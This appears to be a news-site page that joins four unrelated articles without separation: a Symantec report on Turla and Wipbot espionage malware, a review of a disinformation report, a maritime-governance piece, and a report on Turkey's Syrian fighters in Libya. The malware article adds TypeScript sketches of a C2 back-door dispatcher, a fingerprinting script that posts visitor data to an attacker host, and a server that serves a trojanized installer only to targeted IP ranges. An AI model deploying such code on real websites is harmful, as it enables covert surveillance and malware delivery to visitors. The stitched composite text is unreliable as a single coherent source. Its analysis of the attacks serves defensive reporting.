Turla: Spying tool targets governments and diplomats

MD Staff

A cyberespionage campaign involving malware known as Wipbot and Turla has systematically targeted the governments and embassies of a number of former Eastern Bloc countries. Trojan.Wipbot (known by other vendors as Tavdig) is a back door used to facilitate reconnaissance before the attackers shift to long-term monitoring operations using Trojan.Turla (known by other vendors as Uroburos, Snake, and Carbon). This combination of malware appears to have been used in classic espionage operations for at least four years. Given the targets chosen and the advanced nature of the malware, Symantec believes a state-sponsored group was behind these attacks.

Turla provides the attacker with powerful spying capabilities. It is configured to start every time the computer boots, and once the user opens a Web browser it opens a back door that enables communication with the attackers. Through this back door, the attackers can copy files from the infected computer, connect to servers, delete files, and load and execute other forms of malware, among other capabilities.
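
Symantec's write-up does not reproduce the back door's code, but the capability list implies a simple poll-and-dispatch design. The TypeScript sketch below illustrates only that generic pattern; the command names and the idea of a JSON command feed are illustrative assumptions, not observed Turla indicators.

    // Abstract sketch of a poll-and-dispatch back door of the kind described
    // above; command names and feed format are invented for illustration.
    type Command =
      | { kind: "copy_file"; path: string }      // exfiltrate a document
      | { kind: "delete_file"; path: string }    // cover tracks
      | { kind: "execute"; payloadUrl: string }; // stage additional malware

    async function pollCommandServer(c2Url: string): Promise<Command[]> {
      // Communication starts only once the user opens a browser, letting
      // the traffic blend into ordinary web activity.
      const response = await fetch(c2Url);
      return (await response.json()) as Command[];
    }

    function dispatch(command: Command): void {
      switch (command.kind) {
        case "copy_file":   /* read the file and upload it to the C2 */ break;
        case "delete_file": /* remove the file from disk */ break;
        case "execute":     /* fetch and run a further payload */ break;
      }
    }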

The group behind Turla uses a two-pronged attack strategy, infecting victims through spear phishing emails and watering hole attacks. The watering hole attacks display considerable technical competence: the attackers compromise a range of legitimate websites but deliver malware only to visitors arriving from pre-selected IP address ranges. These compromised websites deliver a payload of Trojan.Wipbot, which is then highly likely used as a downloader to deliver Turla to the victim.

Victims
While infections initially appeared to be spread across a range of European countries, closer analysis revealed that many infections in Western Europe occurred on computers connected to the private government networks of former Eastern Bloc countries. These infections appear to have occurred at the embassies of those countries.

Analysis of infections revealed that the attackers were heavily focused on a small number of countries. For example, in May 2012, the office of the prime minister of a former Soviet Union member country was infected. The infection spread rapidly, and up to 60 computers at the prime minister's office were compromised.

Another attack, in late 2012, infected a computer at a second former Soviet Union member country's embassy in France. During 2013, infections began to spread to other computers on the network of this country's ministry of foreign affairs, and its ministry of internal affairs was also infected. Further investigation uncovered a systematic spying campaign targeting its diplomatic service, with infections discovered at embassies in Belgium, Ukraine, China, Jordan, Greece, Kazakhstan, Armenia, Poland, and Germany.

At least five other countries in the region were targeted by similar attacks. While the attackers have largely focused on the former Eastern Bloc, a number of other targets were also found. These included the ministry for health of a Western European country, the ministry for education of a Central American country, a state electrical authority in the Middle East, and a medical organization in the US.

Prior to publication, Symantec notified all relevant national authorities, such as the Computer Emergency Response Teams (CERTs) that handle and respond to Internet security incidents.

Attack vectors
The group behind Turla uses spear phishing emails and watering hole attacks to infect victims. Some of the spear phishing emails purported to come from a military attaché at a Middle Eastern embassy and carried an attachment masquerading as the minutes of meetings. Opening the attachment dropped Trojan.Wipbot onto the victim's computer. Wipbot is believed to be the delivery mechanism for Turla, as the two share several similarities in code and structure.

Since September 2012, the group has compromised at least 84 legitimate websites to facilitate watering hole attacks. Websites owned by a number of different governments and international agencies were among those compromised by the attackers.

Visitors to these sites were redirected to Web servers where a 'fingerprinting' script was executed. This script collected identifying information about the visitor's computer. This phase of the campaign served as an intelligence trawl, gathering information about which browsers and plugins visitors were using, which would help identify the exploits most likely to work against them.
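
Such fingerprinting scripts are typically a few lines of browser-side code. A minimal TypeScript sketch of what a generic probe of this kind might look like follows; the field names and the collection endpoint are hypothetical, not recovered from the campaign.

    // Hypothetical browser fingerprinting probe; all names are illustrative.
    interface Fingerprint {
      userAgent: string;  // browser family and version
      language: string;   // locale, a hint at the visitor's country
      platform: string;   // operating system
      plugins: string[];  // installed plugins, e.g. outdated Java or Flash
      screen: string;     // screen geometry
    }

    function collectFingerprint(): Fingerprint {
      return {
        userAgent: navigator.userAgent,
        language: navigator.language,
        platform: navigator.platform,
        plugins: Array.from(navigator.plugins).map((p) => p.name),
        screen: `${screen.width}x${screen.height}`,
      };
    }

    // Send the profile to a logging endpoint controlled by the attackers.
    fetch("https://logging-host.invalid/collect", {
      method: "POST",
      body: JSON.stringify(collectFingerprint()),
    });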

The next phase of the operation was highly targeted, with servers configured to drop Wipbot only to IP addresses associated with intended targets. In one instance, the delivered malware was disguised as a Shockwave installer bundle. Wipbot was then used to gather further information about the infected computer. If the attackers deemed the victim of interest, it appears likely that a second back door (Trojan.Turla) with far greater capabilities was downloaded onto the victim's computer.
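
Serving a payload only to pre-selected address ranges requires little more than a branch in the compromised web server. A minimal sketch, assuming a Node.js server and placeholder address prefixes (none of these values come from the actual campaign):

    // IP-gated delivery: targets get the dropper, everyone else sees the
    // unmodified page, which keeps the compromise quiet.
    import * as http from "http";

    const targetPrefixes = ["203.0.113.", "198.51.100."]; // placeholders

    http.createServer((req, res) => {
      const visitorIp = req.socket.remoteAddress ?? "";
      if (targetPrefixes.some((prefix) => visitorIp.includes(prefix))) {
        // Serve the dropper disguised as an installer bundle.
        res.writeHead(200, { "Content-Type": "application/octet-stream" });
        res.end("...trojanized installer bytes...");
      } else {
        res.writeHead(200, { "Content-Type": "text/html" });
        res.end("<html>normal content</html>");
      }
    }).listen(8080);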

Wipbot appears to act as a reconnaissance tool, while Turla is used to maintain a long-term presence on the victim's computer. Analysis conducted by Symantec has found several technical connections between Wipbot and Turla, indicating that the same group, or a larger organization, wrote both pieces of code.

Turla
Symantec has been tracking the activities of the group behind Turla for a number of years. The identity of the attackers has yet to be established, although timestamps from activity associated with the attacks indicate that most of it occurs during the standard working day of the UTC+4 time zone.
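
The inference behind such timestamp analysis is straightforward: shift each activity timestamp into the candidate time zone and look for a nine-to-five cluster. A small sketch with invented sample timestamps:

    // Bucket activity timestamps by hour after shifting into UTC+4.
    const activityTimestampsUtc: Date[] = [
      new Date("2013-03-04T05:12:00Z"), // 09:12 in UTC+4
      new Date("2013-03-04T06:45:00Z"), // 10:45 in UTC+4
      new Date("2013-03-05T13:30:00Z"), // 17:30 in UTC+4
    ];

    const hourCounts: number[] = new Array(24).fill(0);
    for (const ts of activityTimestampsUtc) {
      const localHour = (ts.getUTCHours() + 4) % 24; // shift into UTC+4
      hourCounts[localHour] += 1;
    }

    // A peak between 09:00 and 18:00 suggests a standard working day there.
    hourCounts.forEach((count, hour) => {
      if (count > 0) console.log(`${hour}:00  ${"#".repeat(count)}`);
    });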

Turla is an evolution of an older piece of malware, Trojan.Minit, which has been in operation since 2004. The current campaign is the work of a well-resourced and technically competent attack group that is capable of penetrating many network defenses. It is focused on targets that would be of interest to a nation state, with spying and theft of sensitive data among its objectives.

Symantec protection
Symantec has the following detection in place for the malware used in these attacks:

AV

    Trojan.Turla
    Trojan.Wipbot

IPS

    System Infected: Trojan.Turla Activity
    System Infected: Trojan.Turla Activity 2

Conspiracy Theories, Fake News and Disinformation: Why There’s So Much of It and What We Can Do About it

In March 2019, under the aegis of the United States Department of State, a group of researchers released a report called "Weapons of Mass Distraction: Foreign State-Sponsored Disinformation in the Digital Age." The report focuses mostly on foreign states' propaganda, disinformation, and fake news and, with the upcoming US elections in mind, offers practical recommendations for policymakers and stakeholders.

The report begins with a horrific story broadcast on the Russian state-owned Channel One in 2014, which claimed that Ukrainian soldiers had crucified a child in front of the mother's eyes. The story was later proven fake: there was no killed child and no shocked mother. Still, the story went viral, reaching a much broader audience on social media than it did on television.

The authors refer to that story as "an example of Kremlin-backed disinformation campaign" and state that "in subsequent years, similar tactics would again be unleashed by the Kremlin on other foreign adversaries, including the United States during the lead-up to the 2016 presidential election."

Undoubtedly, the fake story did a lot of damage to the reputation of Channel One and other state-funded media. It is clear why the authors begin with that story: it was poorly done, obviously faked, and quickly exposed. Yet it showed how effective and powerful social media can be, despite all the reputational risks. The report also highlights an important point, namely that "the use of modern-day disinformation does not start and end with Russia. A growing number of states, in the pursuit of geopolitical ends, are leveraging digital tools and social media networks to spread narratives, distortions, and falsehoods to shape public perceptions and undermine trust in the truth." Much research on propaganda and fake news holds Russia solely responsible for disinformation; this report, by contrast, addresses propaganda and disinformation as a comprehensive problem.

In the introduction, the authors frame disinformation as a problem with two major factors: the impact of the technology giants, and the psychology of how people consume information on the Internet. The technology giants have reshaped how information spreads, and the proliferation of social media platforms has left the information ecosystem vulnerable to foreign, state-sponsored actors. "The intent [of bad foreign actors] is to manipulate popular opinion to sway policy or inhibit action by creating division and blurring the truth among the target population."

Another important aspect of disinformation highlighted in the report is the abuse of fundamental human biases and behaviour. The report states that "people are not rational consumers of information. They seek swift, reassuring answers and messages that give them a sense of identity and belonging." This is borne out by research showing that, on average, a false story reaches 1,500 people six times more quickly than a factual account. Indeed, conspiracy stories have become commonplace, and even more widespread during the current pandemic, when 5G towers, Bill Gates, and "evil Chinese scientists" who supposedly invented the coronavirus became scapegoats, with many more paranoid conspiracy stories spreading across the Internet.

What is the solution? The authors do not blame any single country, the tech giants, or human behavior. Rather, they suggest the solution must be comprehensive: "the problem of disinformation is therefore not one that can be solved through any single solution, whether psychological or technological. An effective response to this challenge requires understanding the converging factors of technology, media, and human behaviours."

Define the Problem First

What is the difference between fake news and disinformation? How does disinformation differ from misinformation? Few reports dedicate a whole chapter to terminology, and "Weapons of Mass Distraction" provides readers with a solid theoretical grounding. The authors admit that definitions abound and that it is difficult to ascribe exact parameters to disinformation. However, the report notes that "misinformation is generally understood as the inadvertent sharing of false information that is not intended to cause harm, just as disinformation is widely defined as the purposeful dissemination of false information."

Psychological Factors

As mentioned at the outset, the authors do not attach labels or focus on one side of the problem. A considerable part of the report is dedicated to the psychological factors behind disinformation. The section helps readers understand the behavioural patterns of how humans consume information, why it is easy to fall for a conspiracy theory, and how to use this knowledge to prevent the spread of disinformation.

The findings are surprising. Several cognitive biases make it easy for disinformation to flourish, and the bad news is that there is little we can do about them.

First of all, confirmation bias and selective exposure lead people to prefer information that confirms their preexisting beliefs, making information consistent with those beliefs more persuasive. These biases also work together with naïve realism, which "leads individuals to believe that their perception of reality is the only accurate view and that those who disagree are simply uninformed or irrational."

In practice, these cognitive biases are widely exploited by tech giants. That does not mean there is a conspiracy behind it; it means it is easy for big tech companies to sell their products using so-called "filter bubbles." Such a bubble is an algorithm that selectively guesses what information a user would like to see based on data about the user, such as location, past click behaviour, and search history. Filter bubbles work especially well on websites like YouTube: a Wall Street Journal investigation found that YouTube's recommendations often lead users to channels that feature conspiracy theories, partisan viewpoints, and misleading videos, even when those users haven't shown interest in such content.
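
At its core, such an algorithm simply ranks content by similarity to past behaviour. The toy TypeScript sketch below, with invented data and a deliberately naive scoring rule, shows why the loop is self-reinforcing:

    // Toy "filter bubble": recommend items that overlap with past clicks.
    interface Item { id: string; topics: string[]; }

    function recommend(clicked: string[], catalog: Item[], k: number): Item[] {
      const score = (item: Item) =>
        item.topics.filter((t) => clicked.includes(t)).length;
      // Ranking by overlap with past behaviour keeps surfacing more of the
      // same, which is how the bubble reinforces preexisting beliefs.
      return [...catalog].sort((a, b) => score(b) - score(a)).slice(0, k);
    }

    const catalog: Item[] = [
      { id: "video-1", topics: ["conspiracy", "5g"] },
      { id: "video-2", topics: ["cooking"] },
      { id: "video-3", topics: ["conspiracy", "vaccines"] },
    ];

    // A user who clicked conspiracy content is recommended more of it.
    console.log(recommend(["conspiracy"], catalog, 2).map((i) => i.id));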

These days, the most popular ways to counter misinformation are fact-checking and debunking false information. In the report, the researchers present evidence that these familiar methods may not be that effective: "Their analysis determined that users are more active in sharing unverified rumours than they are in later sharing that these rumours were either debunked or verified. The veracity of information, therefore, appears to matter little. A related study found that even after individuals were informed that a story had been misrepresented, more than a third still shared the story."

Another finding is that "participants who perceived the media and the word 'news' negatively were less likely than others to identify a fake headline and less able to distinguish news from opinion or advertising." There is an obvious reason for this: a lack of trust. Recent research shows the public has low trust in journalists as a source of information about the coronavirus, and according to the American Press Institute, only 43 per cent of people said they could easily distinguish factual news from opinion in online-only news or social media. Most people, in other words, can hardly distinguish news from opinion at a time when trust in journalism is at a historic low, so it is no surprise that they perceive news so negatively.

This has implications for news validation, which the report notes can differ from country to country: "Tagging social media posts as 'verified' may work well in environments where trust in news media is relatively high (such as Spain or Germany), but this approach may be counterproductive in countries where trust in news media is much lower (like Greece)."

The research base also reveals several further essential findings. First, increasing online communities' exposure to different viewpoints is rather counterproductive: research presented in the report found that such exposure made conservatives more conservative and liberals more liberal.

Second, belief perseverance, the inability of people to change their minds even after being shown new information, means that facts can matter little in the face of strong social and emotional dynamics.

Third, developing critical thinking skills and increasing media literacy may also be counterproductive or of minimal use. Research shows that "many consumers of disinformation already perceive themselves as critical thinkers who are challenging the status quo." Even debunking false messages may not be effective: showing corrective information did not always reduce participants' belief in misinformation, and when "consumers of fake news were presented with a fact-check, they almost never read it."

What can be done here? The authors provide the reader with a roadmap for countering misleading information, although, by the report's own admission, the roadmap, which is likewise grounded in research, may be of limited use.

The main idea is to be proactive. While debunking false messages, developing critical thinking, and other familiar tools have minimal potential, some psychological interventions can help build resilience against disinformation. The authors liken disinformation and misinformation to a disease and propose the equivalent of a vaccine that builds resistance to the virus. This strategy means that people should be warned "that they may be exposed to information that challenges their beliefs, before presenting a weakened example of the (mis)information and refuting it."

Another aspect of the roadmap is showing different perspectives, "which allows people to understand and overcome the cognitive biases that may render them adversarial toward opposing ideas." According to the authors, this approach should focus less on the content of one's thoughts and more on their structure. The very factors that make humans susceptible to disinformation can thus become part of the solution.

What About the Tech Giants?

The authors argue that social media platforms should play a central role in neutralizing online disinformation. Yet even though the tech giants have demonstrated a willingness to address disinformation, their incentives do not always favor limiting it; indeed, their business models can align with spreading more of it. "Users are more likely to click on or share sensational and inaccurate content; increasing clicks and shares translates into greater advertising revenue. The short-term incentives, therefore, are for the platforms to increase, rather than decrease, the amount of disinformation their users see."

The technological section of the report is split into three parts, dedicated to Facebook, Twitter, and Google. While the report details what these companies have already done to counter disinformation, we will highlight only the recommendations and the challenges that remain.

Despite all the initiatives Facebook has implemented in recent years, the platform remains vulnerable to disinformation. The main vulnerability lies in its messaging apps: WhatsApp was a major source of disinformation during the Rohingya crisis in 2018 and during the Brazilian presidential elections that same year. The second vulnerability lies in third-party fact-checking services staffed by human operators, who struggle to handle the volume of content: "fake news can easily go viral in the time between its creation and when fact-checkers are able to manually dispute the content and adjust its news feed ranking."

Despite its own vulnerabilities, including a colossal bot network, Twitter has become more effective at countering the threat using technologies such as AI. How proactive the company will be in countering the threat remains an open question, but Twitter now follows best practices, according to the report.

Google, with its video-sharing platform YouTube and its ad platform, might be the most vulnerable of the three. YouTube, with its personalized recommendation algorithm (filter bubbles), has faced strong criticism for reinforcing viewers' belief that conspiracies are, in fact, real. In 2019, however, YouTube announced that it would adjust its algorithms to reduce recommendations of misleading content.

It is not just the tech giants, however, who should take responsibility for disinformation. According to the report, it is states that bear the ultimate responsibility for "defending their nations against this kind of disinformation." Yet, since the platforms remain in private hands, what can governments do?

For one, they could play a more significant role in regulating social media companies. According to the report, this does not mean total control of those companies. The authors admit, however, that such regulation risks restricting freedom of speech or sliding into outright censorship, and that there is no easy, straightforward way to solve this complex problem.

What can we do about it? According to the report, technology will change, but the problem will not be solved within the next decade; we will have to learn to live with disinformation. At the same time, public policies should focus on mitigating its most disastrous consequences while maintaining civil liberties, freedom of expression, and privacy.

The report offers quite a balanced approach to the problem. While other research projects pin blame on particular countries or technologies, the authors of "Weapons of Mass Distraction" admit the solution will not be easy: it is a complex problem that will require a complex solution.

From our partner RIAC

Engaging with Local Stakeholders to Improve Maritime Security and Governance

Michael Van Ginkel

Illicit activity in the maritime domain takes place within a complex cultural, physical, and political environment. When dialogue is initiated with a diverse range of stakeholders, policy recommendations can take into account region-specific limitations and opportunities. As noted in the Stable Seas: Sulu and Celebes Seas maritime security report, sectors like fisheries, coastal welfare, and maritime security are intrinsically linked, making engagement with a diverse range of local stakeholders a necessity. This collaborative approach is essential to devising efficient and sustainable solutions to maritime challenges. Engagement with local stakeholders helps policymakers discover where in these self-reinforcing cycles additional legislation or enforcement would have the greatest positive impact. Political restrictions against pursuing foreign fishing trawlers in Bangladesh, for example, have allowed the trawlers to target recovering populations of hilsa while local artisanal fishers suffer. In the context of the Philippines, the Stable Seas program and the Asia Pacific Pathways to Progress Foundation recently conducted a workshop that highlighted the importance of consistent stakeholder engagement, resulting in a policy brief entitled A Pathway to Policy Change: Improving Philippine Fisheries, Blue Economy, and Maritime Law Enforcement in the Sulu and Celebes Seas.

Physical Environment

Consistent communication with local stakeholders on regional anomalies allows policymakers to modify initiatives to adjust for the physical, cultural, and political context of a maritime issue. The physical environment affects how, where, and why illicit actors operate in the maritime domain. Knowledge held by local stakeholders about uninhabited coastlines, local currents, and the locations of important coastal communities helps policymakers find recognizable patterns in the locations and frequency of maritime incidents. The 36,289 km of coastline in the Philippine archipelago means that almost 60 percent of the country’s municipalities and cities border the sea. The extensive coastline and high levels of maritime traffic make monitoring coastal waters and achieving maritime domain awareness difficult for maritime law enforcement agencies. A Pathway to Policy Change outlines several recommendations by regional experts on ways to improve maritime domain awareness despite limitations imposed by a complex physical environment. The experts deemed collaboration with local government and land-based authorities an important part of addressing the problem. By engaging with stakeholders working in close proximity to maritime areas, policymakers can take into account their detailed knowledge of local environmental factors when determining the method and motive behind illicit activity.

Cultural Environment

Culture shapes how governments respond to non-traditional maritime threats. Competition and rivalry between maritime law enforcement agencies can occur within government structures. A clearer understanding of the cultural pressures exerted on community members can help policymakers develop the correct response. Strong ties have been identified between ethnic groups and insurgency recruiting grounds in Mindanao: the Tausug, for instance, tend to fight for the Moro National Liberation Front (MNLF), while the Moro Islamic Liberation Front (MILF) mostly recruits from the Maguindanaons and the Maranao. Without guidance from local stakeholders familiar with cultural norms, such correlations could go unnoticed, or the motivations for joining insurgency movements could be misconstrued as based solely on extremist or separatist ideology. Local stakeholders can offer alternative explanations for behavioral patterns that policymakers need to accommodate.

Political Environment

Local stakeholder engagement allows policymakers to work on initiatives that accommodate limitations imposed by the political environment. Collaboration with local stakeholders can provide information on what government resources, in terms of manpower, capital, and equipment, are available for use. Stakeholders also provide important insights into complex political frameworks that can make straightforward policy implementation difficult. Understanding where resource competition and overlapping jurisdictions exist enables policymakers to formulate more effective initiatives. Despite strong legislation regulating illegal, unreported, and unregulated (IUU) fishing in the Philippines, local stakeholders have pointed out that overlapping jurisdictions have created exploitable gaps in law enforcement. In A Pathway to Policy Change, local experts suggested that the government issue an executive order to unify mandates in the fisheries sector to address the issue. Similarly, the Bangsamoro Autonomous Region of Muslim Mindanao (BARMM) is highlighted as a region that heavily influences maritime security in the Sulu and Celebes Seas. Working with government officials to understand how policy initiatives must adjust for the region's semi-autonomous status ensures maritime issues are properly addressed. BARMM, for instance, issues fishing permits for its own waters in addition to government permits, which can cause inconsistencies. Working alongside local stakeholders allows policymakers to create initiatives that take into account special circumstances within the political system.

Private Sector Engagement

Extending engagement with local stakeholders to the private sector is particularly important during both the policy research and implementation processes. Encouraging private stakeholders to actively help counter illicit activity can help policymakers create a more sustainable and efficient solution to security threats. As A Pathway to Policy Change highlights, private companies already have a strong incentive from a business perspective to involve themselves in environmental and social issues. Governments can encourage further involvement of private stakeholders like blue economy businesses and fishers by offering tax breaks and financial compensation for using sustainable business practices and for helping law enforcement agencies gather information on illicit activity. Offering financial rewards to members of the Bantay Dagat program in the Philippines, for example, would encourage more fishers to participate. Governments can also double down on educational programs to raise awareness of important issues threatening local economic stability. By communicating consistently with local stakeholders, policymakers can both more accurately identify maritime security needs and more comprehensively address them.

Conclusion

The unique physical, cultural, and political context in which maritime issues take place makes the knowledge of local stakeholders an invaluable asset. While many important types of information can be collected without working closely with stakeholders, innumerable aspects of any given context cannot be quantified and analyzed from afar. Engagement with stakeholders provides a nuanced understanding of the more localized and ephemeral factors that affect regional maritime security, allowing policymakers to capitalize on opportunities and circumvent limitations created by the political, cultural, and physical environment surrounding maritime issues in order to create sustainable, long-term solutions.

Turkey Faced With Revolt Among Its Syrian Proxies Over Libyan Incursion

Relations between Turkey and Syrian armed groups, long considered cordial thanks to the massive support Turkish authorities have provided to the Syrian opposition, are rapidly deteriorating over Turkey's incursion into the Libyan conflict, according to sources among the Syrian militants fighting in Libya.

Last month, over 2,000 fighters defected from the Sultan Murad Division, one of the key armed factions serving Turkish interests in Syria. The group's members chose to quit after they were ordered to go to Libya to fight on the side of the Turkey-backed Government of National Accord (GNA). This marks a drastic shift in the attitude of Syrian fighters towards participation in the Libyan conflict: just a few months ago there was no shortage of mercenaries willing to fly to Libya via Turkey for lucrative compensation of $2,000–5,000 and a promise of Turkish citizenship offered by Ankara.

Both promises turned out to be an exaggeration, if not an outright lie. The militants who traveled to Libya received neither the money nor the citizenship and other perks promised to them, according to Zein Ahmad, a fighter of the Ahrar al-Sharqiya faction. Moreover, he said that after the fighters arrived in Libya they were immediately dispatched to Tripoli, an arena of regular clashes between GNA forces and units of the Libyan National Army (LNA), despite Turkish promises that they would be tasked with maintaining security at oil facilities.

Data gathered by the Syrian Observatory for Human Rights shows that around 9,000 members of Turkey-backed Syrian armed factions are currently fighting in Libya, while another 3,500 men are undergoing training in Syria and Turkey in preparation for departure. Among them are former members of terror groups such as Hayat Tahrir al-Sham (HTS), Al-Qaeda's affiliate in Syria, as confirmed by reports of the capture of a 23-year-old HTS fighter, Ibrahim Muhammad Darwish, by LNA forces. Another example is an ISIS terrorist, also captured by the LNA, who confessed that he had been flown in from Syria via Turkey.

By sending Syrian fighters to Libya, Ankara intended to recycle and repurpose these groups to establish its influence without the risks and consequences of a large-scale military operation involving major expenses and casualties among Turkish military personnel. Recent developments on the ground, however, show that this goal has not been fully achieved.

The Syrian fighters are sustaining heavy casualties due to their lack of training and weaponry. Total losses among the Turkey-backed groups have reached the hundreds and continue to grow as the GNA and LNA clash with intermittent success. Unless Turkey's President Recep Erdogan curbs his ambitions, the destructive involvement of the Syrian armed groups in Libya may end in the collapse of Turkey's influence over the Syrian opposition.
